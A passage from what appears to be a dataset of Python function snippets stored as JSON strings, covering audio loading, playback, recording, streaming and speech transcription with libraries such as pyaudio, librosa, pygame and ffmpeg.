no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n format=audio.get_format_from_width(ding_wav.getsampwidth()),\n channels=ding_wav.getnchannels(),\n rate=ding_wav.getframerate(), input=False, output=True)\n stream_out.start_stream()\n stream_out.write(ding_data)\n time.sleep(0.2)\n stream_out.stop_stream()\n stream_out.close()\n audio.terminate()", "def load_and_process_audio(self):\n output_vector = None\n doa = None\n if self.model == \"gcc_cnn\":\n output_vector, doa = self.format_gcc_cnn()\n elif self.model == \"gcc_dsp\":\n output_vector, doa = self.format_gcc_dsp()\n elif self.model == \"raw_cnn\":\n output_vector, doa = self.format_raw_audio_cnn()\n elif self.model == \"raw_resnet\":\n output_vector, doa = self.format_raw_audio_cnn()\n else:\n print(\"Error -> No file found\")\n\n return output_vector, doa", "def receive_audio(self):\n print(\"got to receive audio\")\n self.receive_audio_socket = 
self.start_socket(IP, RECEIVE_AUDIO_PORT)\n self.send_chunk(self.my_name.encode(), self.receive_audio_socket)\n print(self.receive_mes(self.receive_audio_socket))\n\n print(\"receive stream made\")\n i = 0\n done = False\n while not done:\n try:\n i += 1\n data = self.receive_audio_socket.recv(CHUNK) # gets audio chunk\n #print(\"got audio chunk number {} of length {}\".format(i, len(data)))\n self.lock.acquire()\n self.voice_stream.write(data) # plays\n self.lock.release()\n # if len(data) == 0:\n # done = True\n #print(\"wrote chunk #{}\".format(i))\n except socket.error as msg:\n print(\"socket failure receive audio: {}\".format(msg))\n done = True\n except KeyboardInterrupt:\n print(\"exception receive audio\")\n done = True\n self.receive_audio_socket.close()\n # stream_receive.close()\n # p_receive.terminate()", "def run(self):\r\n\r\n p = pyaudio.PyAudio()\r\n\r\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\r\n channels=wf.getnchannels(),\r\n rate=wf.getframerate(),\r\n output=True)\r\n\r\n musicdata = wf.readframes(CHUNK)\r\n\r\n while playing:\r\n if self.streamnum == 1:\r\n stream.write(musicdata)\r\n musicdata = wf.readframes(CHUNK)\r\n else:\r\n stream.write(musicdata)\r\n musicdata = wf2.readframes(CHUNK)\r\n if len(musicdata) < CHUNK or musicdata == '':\r\n if self.streamnum == 1:\r\n self.streamnum = 2\r\n else:\r\n self.streamnum = 1\r\n self.next = False\r\n if self.pause:\r\n while True:\r\n if not playing:\r\n return\r\n elif not self.pause:\r\n break\r\n\r\n stream.stop_stream()\r\n stream.close()\r\n\r\n p.terminate()", "def play(self, context=None):\n\n self.nowPlaying = True\n\n # Open file for reading\n wf = wave.open(self.path + '/' + self.name, 'rb')\n p = pyaudio.PyAudio()\n\n # Open stream for playback\n stream = p.open( format = p.get_format_from_width( wf.getsampwidth() ),\n channels = wf.getnchannels(),\n rate = wf.getframerate(), output = True)\n\n # Read file in chunks of 1024 bytes\n data = wf.readframes(1024)\n\n # Read while there is data left to read\n # If nowPlaying is False, user has clicked Stop\n while data != '' and self.nowPlaying:\n stream.write(data)\n data = wf.readframes(1024)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n self.nowPlaying = False\n\n # Callback to UI to signal that audio has finished playing\n if context is not None:\n context.stopAudio()", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def read_audio(file_path, resample_rate=None, to_mono=False):\n return librosa.load(file_path, sr=resample_rate, mono=to_mono)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", 
"def play(self):\n\n try:\n if self.source is None:\n # If there is no source-file, write the data to a temporary WAV-file ...\n tmpFile = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)\n tmpFile.close()\n self.write_wav(tmpFile.name)\n \n # ... and play that file\n if sys.platform=='win32':\n winsound.PlaySound(tmpFile.name, winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', tmpFile.name]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(tmpFile.name)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', tmpFile.name]\n #subprocess.run(cmd)\n \n elif os.path.exists(self.source):\n # If you have a given input file ...\n print('Playing ' + self.source)\n \n # ... then play that one\n if sys.platform == 'win32':\n winsound.PlaySound(str(self.source), winsound.SND_FILENAME)\n elif sys.platform == 'darwin':\n cmd = ['afplay', str(self.source)]\n subprocess.run(cmd)\n else:\n pygame.init()\n pygame.mixer.music.load(self.source)\n pygame.mixer.music.play()\n time.sleep(self.duration)\n \n # If you want to use FFMPEG instead, use the following commands:\n #cmd = [self.ffmpeg_info.ffplay, '-autoexit', '-nodisp', '-i', self.source]\n #subprocess.run(cmd)\n \n except SystemError:\n print('If you don''t have FFMPEG available, you can e.g. use installed audio-files. E.g.:')\n print('import subprocess')\n print('subprocess.run([r\"C:\\Program Files (x86)\\VideoLAN\\VLC\\vlc.exe\", r\"C:\\Music\\14_Streets_of_Philadelphia.mp3\"])')", "def read_audio(self, path_to_wav):\n y, sr = librosa.load(path_to_wav, sr=None)\n return (y, sr)", "def process_files(audio_files, context=[]):\n\n results = []\n bar_limit = len(audio_files)\n client = speech.SpeechClient()\n with Bar('Processing:', max=bar_limit) as bar:\n for audio in audio_files:\n response = convert_speech_to_text(client, audio, context)\n (transcription, confidence) = transcript(response)\n results.append({\n \"path\": audio,\n \"transcription\": transcription,\n \"confidence\": confidence\n })\n bar.next()\n return results", "def inputwav(filename):\n data, sr = sf.read(filename)\n print('Decoding \"'+filename+'\"...')\n print('Sample rate is '+str(sr)+'...')\n try:\n ch=len(data[0,])\n except:\n ch=1\n print('File contains '+str(ch)+' audio channel(s)...')\n #Reshape the data so other functions can interpret the array if mono.\n #basically transposing the data\n if ch==1:\n data=data.reshape(-1,1)\n n=len(data)\n #This prevents log(data) producing nan when data is 0\n data[np.where(data==0)]=0.00001\n #convert to dB\n data_dB=20*np.log10(abs(data))\n return n, data,data_dB,sr, ch", "def loadAudio(self,path):\r\n if self.vid:# Release video to access\r\n self.vid.release()\r\n # Check if has audio\r\n mixer.music.unload()\r\n command = \"ffprobe -i \\\"{0}\\\" -show_streams -select_streams a -loglevel error\".format(path)\r\n result = run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n if result.stdout.startswith(\"[STREAM]\"):# Contains audio\r\n self.hasAudio = True\r\n else:\r\n self.hasAudio = False\r\n return\r\n print(\"Preparing Audio...\",end=\"\")\r\n filename = \"project_audio.mp3\"\r\n self.aud_path = filename\r\n t_start = time.time()\r\n # Extract audio using ffmpeg, always overwrite\r\n command = \"ffmpeg -y -i \\\"{0}\\\" \\\"{1}\\\"\".format(path,filename)\r\n result = 
run(command,stdout=PIPE,stderr=PIPE,universal_newlines=True,shell=True)\r\n## print(result.stderr)\r\n t_end = time.time()\r\n print(\"Done[{0}]\".format(int(t_end-t_start)))\r\n try:\r\n mixer.music.unload()\r\n mixer.music.load(filename)\r\n except:\r\n print(\"Error Loading Audio\")\r\n self.hasAudio = False\r\n self.vid = cv2.VideoCapture(self.vid_path)# Reload video component\r\n # Launch in GUI Thread\r", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def read_process_song(path, window=1, overlap=0, debug=True):\n\n arr_features = []\n\n signal, sr = librosa.load(path)\n signal = signal[:660000]\n\n # Debug process\n if debug:\n print(\"Reading file: {}\".format(path))\n\n # Split songs:\n samples = split_songs(signal, window, overlap)\n\n # Append the result to the data structure\n for s in samples:\n features = get_features(s, sr)\n arr_features.append(features)\n return arr_features", "def process_file(self, file_name):\n logger.info(f'Recognising speech for {file_name}')\n wf = wave.open(file_name, \"rb\")\n # Check to see if the audio file can be read by the Vosk model\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n raise Exception(f'Invalid file format for {file_name}')\n rec = KaldiRecognizer(self.model, wf.getframerate())\n results = []\n while True:\n data = wf.readframes(config.frame_to_read)\n # If the data we have read is empty then we are at the end of the file\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n result = json.loads(rec.Result())\n # Result can contain an empty text string but no result list\n if len(result['text']) > 0:\n # If we reach here we have accepted the translation of a section of text\n results.extend(result['result'])\n result = json.loads(rec.FinalResult())\n # Add to results list\n if len(result['text']) > 0:\n results.extend(result['result'])\n logger.info(f'Processed speech, captured {len(results)} results')\n return results", "def handle_audio_input(message):\n def build_context(msg: Message):\n ctx = {'client_name': 'mycroft_listener',\n 'source': msg.context.get(\"source\" or \"speech_api\"),\n 'destination': [\"skills\"],\n \"audio_parser_data\": msg.context.get(\"audio_parser_data\"),\n \"client\": msg.context.get(\"client\"), # origin (local, klat, nano, mobile, api)\n \"neon_should_respond\": msg.context.get(\"neon_should_respond\"),\n \"username\": msg.context.get(\"username\"),\n \"timing\": {\"start\": msg.data.get(\"time\"),\n \"transcribed\": time.time()},\n \"ident\": msg.context.get(\"ident\", time.time())\n }\n if msg.context.get(\"klat_data\"):\n ctx[\"klat_data\"] = msg.context(\"klat_data\")\n ctx[\"nick_profiles\"] = msg.context.get(\"nick_profiles\")\n return ctx\n\n ident = message.context.get(\"ident\") or \"neon.audio_input.response\"\n wav_file_path = message.data.get(\"audio_file\")\n lang = message.data.get(\"lang\")\n try:\n _, parser_data, transcriptions = _get_stt_from_file(wav_file_path, lang)\n message.context[\"audio_parser_data\"] = parser_data\n context = build_context(message)\n data = {\n \"utterances\": transcriptions,\n \"lang\": message.data.get(\"lang\", \"en-us\")\n }\n handled = _emit_utterance_to_skills(Message('recognizer_loop:utterance', data, context))\n bus.emit(message.reply(ident, data={\"parser_data\": parser_data,\n \"transcripts\": transcriptions,\n \"skills_recv\": handled}))\n except Exception as e:\n LOG.error(e)\n 
bus.emit(message.reply(ident, data={\"error\": repr(e)}))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def play_audio():\n directory = os.fsencode(MINI_PATH)\n print(directory)\n adp= []\n # lst = os.listdir(directory)\n # lst.sort()\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n #print(file)\n\n if filename.endswith(\".mp3\"): \n adp.append(MINI_PATH+filename)\n #print(adp)\n adp.sort()\n print(\"ADP: \", adp)\n x = \"|\".join(adp)\n print( f'concat:{x}')\n subprocess.call(['ffmpeg', '-i', f'concat:{x}', '-acodec', 'copy', RESULT_PATH])\n \n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(filename)\n if filename.endswith(\".mp3\"):\n os.remove(MINI_PATH+filename)", "def readFile(filename):\r\n speechFile = open(filename, \"r\")\r\n speech = speechFile.read()\r\n speechFile.close()\r\n return speech", "def process_audio_multiprocess(file_paths_arr,\n filt_type, filt_cutoff_freq, filt_order,\n trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength,\n SAMPLE_RATE=48000, MIN_SAMPLE_RATE=15999, BIT_DEPTH=2,\n ignore_dirs=[\"Noise samples\",\"_Noisy_\",\"_Very Noisy_\"], skip_existing=False,\n in_ext_=None, out_ext=\".wav\", use_tqdm=True, dump_sample_rates=True\n ):\n import soundfile as sf\n import scipy\n from scipy import signal\n \n if dump_sample_rates:\n sample_rates = {} # array of dicts. 
e.g: [{path 0: sample_rate 0}, {path 1: sample_rate 1}, {path 2: sample_rate 2}, ...]\n \n skip = 0\n prev_sr = 0\n iterator = tqdm(file_paths_arr, smoothing=0.0) if use_tqdm else file_paths_arr\n for file_path in iterator: # recursive directory search\n in_ext = in_ext_ if (in_ext_ is not None) else os.path.splitext(os.path.split(file_path)[-1])[-1] # get ext from file_path or use override.\n out_path = file_path.replace(in_ext,out_ext)\n if skip_existing and os.path.exists(out_path):\n continue\n if any([filter_dir in file_path for filter_dir in ignore_dirs]):\n continue\n \n # VCTK cleanup\n #if file_path.endswith(f\"_mic1{in_ext}\"):\n # os.rename(file_path, file_path.replace(f\"_mic1{in_ext}\",in_ext))\n #if file_path.endswith(f\"_mic2{in_ext}\"):\n # continue\n try:\n native_sound, native_SR = sf.read(file_path, always_2d=True)\n except RuntimeError as ex:\n print(f'\"{os.path.split(file_path)[-1]}\" failed to load and has been deleted.\\nDELETED PATH: \"{file_path}\"')\n os.unlink(file_path)\n #raise RuntimeError(ex)\n native_sound = native_sound[:,0]# take first channel (either mono or left audio channel)\n native_sound = np.asfortranarray(native_sound).astype('float64') # and ensure the audio is contiguous\n \n if native_SR < MIN_SAMPLE_RATE: # skip any files with native_SR below the minimum\n continue\n if native_SR != SAMPLE_RATE: # ensure all audio is same Sample Rate\n try:\n sound = librosa.core.resample(native_sound, native_SR, SAMPLE_RATE)\n except ValueError as ex:\n print(ex, file_path, native_SR, len(native_sound), sep=\"\\n\")\n raise ValueError(ex)\n else:\n sound = native_sound\n \n if dump_sample_rates:\n sample_rates[os.path.abspath(out_path)] = native_SR\n \n # 24 bit -> 16 bit, 32 bit -> 16 bit\n if max(np.amax(native_sound), -np.amin(native_sound)) > (2**23): # if samples exceed values possible at 24 bit\n sound = (sound / 2**(31-15))#.astype('int16') # change bit depth from 32 bit to 16 bit\n elif max(np.amax(native_sound), -np.amin(native_sound)) > (2**15): # if samples exceed values possible at 16 bit\n sound = (sound / 2**(23-15))#.astype('int16') # change bit depth from 24 bit to 16 bit\n \n # apply audio filters\n for type_, freq_, order_ in zip(filt_type, filt_cutoff_freq, filt_order): # eg[ ['lp'], [40], [10] ] # i.e [type, freq, strength]\n sos = signal.butter(order_, freq_, type_, fs=SAMPLE_RATE, output='sos') # calcuate filter somethings\n sound = signal.sosfilt(sos, sound) # apply filter\n \n # apply audio trimming\n for i, (margin_left_, margin_right_, top_db_, window_length_, hop_length_, ref_, preemphasis_strength_) in enumerate(zip(trim_margin_left, trim_margin_right, trim_top_db, trim_window_length, trim_hop_length, trim_ref, trim_preemphasis_strength)):\n if preemphasis_strength_:\n sound_filt = librosa.effects.preemphasis(sound, coef=preemphasis_strength_)\n _, index = librosa.effects.trim(sound_filt, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n else:\n _, index = librosa.effects.trim(sound, top_db=top_db_, frame_length=window_length_, hop_length=hop_length_, ref=ref_) # gonna be a little messed up for different sampling rates\n try:\n sound = sound[int(max(index[0]-margin_left_, 0)):int(index[1]+margin_right_)]\n except TypeError:\n print(f'Slice Left:\\n{max(index[0]-margin_left_, 0)}\\nSlice Right:\\n{index[1]+margin_right_}')\n assert len(sound), f\"Audio trimmed to 0 length by pass {i+1}\\nconfig = {[margin_left_, margin_right_, top_db_, 
window_length_, hop_length_, ref_]}\\nFile_Path = '{file_path}'\"\n \n # write updated audio to file\n if os.path.exists(out_path):\n os.unlink(out_path) # using unlink incase the out_path object is a symlink\n sf.write(out_path, sound, SAMPLE_RATE)\n \n if dump_sample_rates:\n return sample_rates", "def load_audio(path):\r\n if path[-4:] == \".wav\":\r\n fs, data = load_wav(path)\r\n\r\n elif path[-4:] == \".mp3\":\r\n fs, data = load_mp3(path)\r\n\r\n else:\r\n raise ValueError(\"Wrong file format, use mp3 or wav\")\r\n\r\n return fs, data", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def load_audio(path, target_fs=None):\n y, fs = sf.read(path)\n if y.ndim>1:\n y = np.mean(y, axis=1)\n if target_fs is not None and fs!=target_fs:\n #print('Resampling %d->%d...' %(fs, target_fs))\n y = librosa.resample(y, orig_sr=fs, target_sr=target_fs)\n fs = target_fs\n return y, fs", "def recorder():\n # Following block gets rid of annoying config errors by ALSA\n def py_error_handler(filename, line, function, err, fmt):\n pass\n ERROR_HANDLER_FUNC = CFUNCTYPE(None, c_char_p, c_int, c_char_p, c_int, c_char_p)\n c_error_handler = ERROR_HANDLER_FUNC(py_error_handler)\n asound = cdll.LoadLibrary('libasound.so')\n asound.snd_lib_error_set_handler(c_error_handler) \n\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n yield stream\n\n stream.stop_stream()\n stream.close()\n p.terminate()", "def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]", "def load_music_files():\n # Make a list of music files, right now it is done by collection all files\n # below the current folder whose extension starts with mp3/wav \n print('Loading music files...')\n for path, dirs, files in os.walk('.'):\n for file_ in files:\n file_path = os.path.relpath(os.path.join(path, file_))\n url_path = os.path.join(*[quote(part) for part in os.path.split(file_path)]) \n ext = os.path.splitext(file_)[1].lower()\n name = os.path.splitext(file_)[0].lower()\n key = ''.join(name.split()) # unique key - no spaces\n audio_file = None\n if ext.startswith('.mp3'):\n audio = MP3(file_path) \n audio_file = AudioFile(url_path, audio.info.length, name, key) \n if audio_file:\n music_files.append(audio_file)\n print('Found:', music_files[-1])", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n audio, sr = librosa.load(fhandle, sr=22050, mono=True)\n return audio, sr", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, 
filename)))\r\n await ctx.message.delete()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=44100, mono=True)", "def read(self, path, size, offset, fh, *args, **pargs):\n with self.rwlock:\n if(path in self._open_subtracks):\n real = False\n # Update the last accessed time.\n self._open_subtracks[path]['Last Access'] = time.time()\n # Store the requested offset.\n self._open_subtracks[path]['Positions'][fh] = offset\n else:\n real = True\n if(real):\n # For all non-FLACCue files, just access it normally.\n os.lseek(fh, offset, 0)\n return os.read(fh, size)\n # Wait for the file to finish opening.\n while(True):\n with(self.rwlock):\n self._open_subtracks[path]['Last Access'] = time.time()\n if(self._open_subtracks[path]['Audio'] is not None):\n audio = self._open_subtracks[path]['Audio']\n break\n time.sleep(0.1)\n # Return the data requested.\n if(offset > len(audio)):\n # If we're looking near the end of the file,\n # handle the fact that compression could change the size.\n reported_size = self.getattr(path)['st_size']\n if(offset < reported_size):\n offset = len(audio) - (reported_size - offset)\n return audio[offset:offset+size].tobytes()", "def read( self, song_file_name ):\n song_file = open( song_file_name )\n content = song_file.read()\n return self.split( content )", "def read_audio(ws):\n # Open stream\n global RATE\n p = pyaudio.PyAudio()\n RATE = int(p.get_default_input_device_info()['defaultSampleRate'])\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n # Recognize until timeout or recognition\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n if not RUNNING:\n break\n data = stream.read(CHUNK)\n ws.send(data, ABNF.OPCODE_BINARY)\n\n print(\"Stopped listening\")\n # Disconnect the audio stream\n stream.stop_stream()\n stream.close()\n # Close the WebSocket\n ws.close()\n # Kill the audio device\n p.terminate()", "def read_write_audio(self):\n\n if (self.local_audio_play and\n (self.mem_player.get_write_available() > self.cfg['Audio']['samples_per_frame'] * 2)):\n # send a frame from input to be played\n data_play = self.local_audio_play.popleft()\n\n if self.audio_playing and isinstance(data_play, Frame):\n if len(data_play) == self.cfg['Audio']['samples_per_frame'] * 2:\n self.last_frame_id = self.mem_player.put_frame(data_play.payload)\n self.cfg['Logging']['session_logger'].rec_write(self.audio_playing, data_play.payload)\n\n elif isinstance(data_play, Command):\n if data_play.parsed['__name__'] == 'utterance_start':\n self.audio_playing = data_play.parsed['fname']\n self.message_queue.append(\n (Command('play_utterance_start(user_id=\"{uid}\",fname=\"{fname}\")'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_start(\"system\", data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if self.audio_playing and data_play.parsed['__name__'] == 'utterance_end':\n self.audio_playing = None\n self.message_queue.append(\n 
(Command('play_utterance_end(user_id=\"{uid}\",fname=\"{fname})'\n .format(uid=data_play.parsed['user_id'], fname=data_play.parsed['fname']),\n 'VoipIO', 'HUB'),\n self.last_frame_id))\n try:\n if data_play.parsed['log'] == \"true\":\n self.cfg['Logging']['session_logger'].rec_end(data_play.parsed['fname'])\n except SessionLoggerException as e:\n self.cfg['Logging']['system_logger'].exception(e)\n\n if (self.mem_capture.get_read_available() > self.cfg['Audio']['samples_per_frame'] * 2):\n # Get and send recorded data, it must be read at the other end.\n data_rec = self.mem_capture.get_frame()\n\n # send the audio only if the call is connected\n # ignore any audio signal left after the call was disconnected\n if self.audio_recording:\n self.audio_record.send(Frame(data_rec))", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def load_audio_data(file_path, config):\n pure_path = pathlib.PurePath(file_path)\n audio_seg = pydub.AudioSegment.from_file(pure_path, pure_path.suffix[1:])\n if audio_seg.frame_rate != config.sample_rate_hertz:\n raise ValueError(\"Mismatch in sample rate: expected: %d; got: %d\" % (\n config.sample_rate_hertz, audio_seg.frame_rate))\n if audio_seg.channels != config.audio_channel_count:\n raise ValueError(\n \"Mismatch in audio channel count: expected: %d; got: %d\" % (\n config.audio_channel_count, audio_seg.channels))\n samples = list(audio_seg.get_array_of_samples())\n # NOTE(cais): We currently use LINEAR16 in the stream requests regardless of\n # the original audio file format. 
Is it possible to avoid converting FLAC to\n # LINEAR16 during these cloud requests?\n return struct.pack('<%dh' % len(samples), *samples)", "def play(self):\n assert pyaudio is not None, (\"You need to have pyaudio installed to \"\n \"use the play_wav function\")\n filename = os.path.join(tempfile.gettempdir(),\n '6003_wave_%s.wav' % abs(hash(tuple(self.samples))))\n self.save(filename)\n f = wave.open(filename, 'r')\n try:\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(f.getsampwidth()),\n channels=f.getnchannels(),\n rate=f.getframerate(),\n output=True)\n\n data = f.readframes(10240)\n while data:\n stream.write(data)\n data = f.readframes(10240)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n finally:\n f.close()\n os.unlink(filename)", "def decode_audio(fp, fs=None, mono=False, normalize=False, fastwav=False, measured = False):\n if measured:\n fp = fp.decode('latin').replace(\"clean\", \"measured\")\n\n if fastwav:\n # Read with scipy wavread (fast).\n _fs, _wav = wavread(fp)\n if fs is not None and fs != _fs:\n raise NotImplementedError('Fastwav cannot resample audio.')\n if _wav.dtype == np.int16:\n _wav = _wav.astype(np.float32)\n _wav /= 32768.\n elif _wav.dtype == np.float32:\n pass\n else:\n raise NotImplementedError('Fastwav cannot process atypical WAV files.')\n else:\n # TODO: librosa currently optional due to issue with cluster installation\n import librosa\n # Decode with librosa load (slow but supports file formats like mp3).\n _wav, _fs = librosa.core.load(fp, sr=fs, mono=False)\n if _wav.ndim == 2:\n _wav = np.swapaxes(_wav, 0, 1)\n\n assert _wav.dtype == np.float32\n\n # At this point, _wav is np.float32 either [nsamps,] or [nsamps, nch].\n # We want [nsamps, 1, nch] to mimic 2D shape of spectral feats.\n if _wav.ndim == 1:\n nsamps = _wav.shape[0]\n nch = 1\n else:\n nsamps, nch = _wav.shape\n _wav = np.reshape(_wav, [nsamps, 1, nch])\n \n # Average channels if we want monaural audio.\n if mono:\n _wav = np.mean(_wav, 2, keepdims=True)\n\n if normalize:\n _wav /= np.max(np.abs(_wav))\n\n return _wav", "def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r", "def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:\n return librosa.load(fhandle, sr=None, mono=True)", "def play_audio(filename):\n os.system(AUDIOPLAYER + ' ' + filename)", "def read_wav_file(wave_file):\n return wavfile.read(wave_file)", "def do_play(*_args):\n print(last_wav_path)\n if last_wav_path and last_wav_path.is_file():\n threading.Thread(\n target=lambda: subprocess.check_call(\n [\"aplay\", \"-q\", str(last_wav_path)]\n )\n ).start()", "def get_audio(filepath, restrict=restrict_range, use_librosa=False, normalize=True):\n try:\n audio, fs = librosa.load(path=filepath, sr=22050)\n except Exception as e:\n fs, audio_ro = 
scipy.io.wavfile.read(filepath)\n audio = np.copy(audio_ro) / 32767\n if fs != 22050:\n print(\"incorrect fs\")\n return None\n # frame-wise calculation\n if restrict:\n start = start_sec * fs\n end = end_sec * fs\n audio = np.array(audio[start:end], dtype=np.float32)\n if normalize is True:\n audio = (cqt_params['normalizing_constant'] * audio) / np.std(audio[np.abs(audio > 0.00001)])\n return audio", "def load_audio_files(path, single_bar=True):\n\n audios = []\n\n for file_root, dirs, files in os.walk(path):\n for name in files:\n # be careful not to get stuck in wrong files like .DS_Store\n if not re.match(r'.*wav', name):\n continue\n name = os.path.join(file_root, name)\n data, sr = sf.read(name)\n assert sr == 44100\n\n if len(data.shape) == 2 and data.shape[1] == 2:\n data = 0.5 * (data[:, 0] + data[:, 1])\n\n # We only use the 2nd bar out of 4\n if single_bar:\n if data.shape[0] >= 4*44100:\n data = data[2*44100:4*44100]\n else:\n data = data[:2*44100]\n\n data = data.astype(np.float32)\n data = torch.from_numpy(data).unsqueeze(dim=0)\n audios.append(data)\n\n return audios", "async def audiofiles(self, ctx):\r\n files = '\"{0}\"'.format('\", \"'.join(self.audio_files))\r\n await ctx.send(\"```Available audio files :\\n{0}```\".format(files))", "def get_audio(path):\n return send_from_directory('audio', path)", "def record_audio(self):\n stream = self.audio.open(format=DEFAULT_FORMAT,\n channels=DEFAULT_CHANNELS,\n rate=DEFAULT_RATE,\n 